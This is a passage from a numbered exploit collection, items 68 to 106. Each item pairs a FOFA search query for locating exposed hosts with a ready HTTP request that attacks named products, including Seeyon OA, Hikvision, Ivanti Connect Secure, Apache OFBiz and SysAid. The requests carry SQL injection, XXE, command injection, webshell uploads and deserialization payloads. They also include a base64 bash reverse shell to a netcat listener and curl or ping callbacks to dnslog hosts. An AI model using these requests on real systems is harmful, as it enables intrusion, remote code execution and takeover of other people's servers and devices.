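                 ("../platform/portal/layout/", "apoxkq", ".jsp"),
                 ("../platform/portal/layout/", "apoxkq", ".txt"),
                 ("attachments", "shell.jsp", ".txt")]:
        print(args, "->", check_upload(*args))
```

The order of the checks matters in practice: the extension allow-list runs first so that a request like the one above is rejected for its fileType alone, and the traversal check is an explicit rejection rather than a silent normalisation, which makes the attempt visible in logs instead of quietly writing the file somewhere under the root.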
68. 万户 ezOFFICE (Wanhu ezOFFICE) wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE (Wanhu ezOFFICE) contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP (Wanhu ezEIP) success.aspx command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 项目管理系统 (Bangyong PM2 project management system) Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 OA (Seeyon OA) getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 M3-Server (Seeyon M3-Server) 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普掌上校园服务管理平台 (NewCapec campus service management platform) service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) flow-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀软件 (Suda Tianyao software) DesignReportSave.jsp interface arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE (Sifudi LOGBASE) operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The exploit request is as follows; it drops a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service washing machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒明御安全网关 (DBAPPSecurity Mingyu security gateway) aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒明御安全网关 (DBAPPSecurity Mingyu security gateway) aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 FE 协作办公平台 (Seeyon FE collaborative office platform) editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 (Hikvision) IP network intercom and broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视综合安防管理平台 (Hikvision integrated security management platform) orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视运行管理中心 (Hikvision operations management center) session command execution
Fastjson command execution
hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神 SecGate 3600 (QiAnXin SecGate 3600) firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi-Anxin Legendsec SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>


Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"


Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast (盈可视) HD smart recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <<ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 encoding of the XML content; the XML is as follows:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>


104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
  "topicurl": "getSysStatusCfg",
  "token": ""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
